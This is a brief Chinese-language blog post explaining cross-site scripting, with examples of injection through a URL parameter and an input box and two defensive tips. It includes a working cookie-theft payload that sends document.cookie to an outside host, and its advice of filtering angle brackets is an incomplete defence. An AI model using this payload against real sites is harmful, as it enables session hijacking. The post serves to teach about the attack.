代码注入攻击xss

是什么

 跨网站指令码,将程序恶意注入到网页上,是网页使用产生影响

 

如何攻击

1,通过链接注入

<!-- http://www.domain.com?name=<script>alert(1)</script> -->
<div>{{name}}</div>    

 

这就会导致页面执行了alert(1)的代码

 

2,通过输入框保存信息

<input v-model="username">
//在输入框打入<script>alert(1)</script> 无论是直接显示还是保存到服务器都会影响使用

 

 

3,劫持cookie,上述方法植入代码,劫持cookie

<script>
    new Image().src =
        "http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);
</script>

 

 

怎么防

1,对输入框,url等来源获取的参数进行过滤,过滤掉尖括号等关键字符

2,禁止js访问cookie

 

posted @ 2021-09-08 16:57  来吃点代码  阅读(599)  评论(0编辑  收藏  举报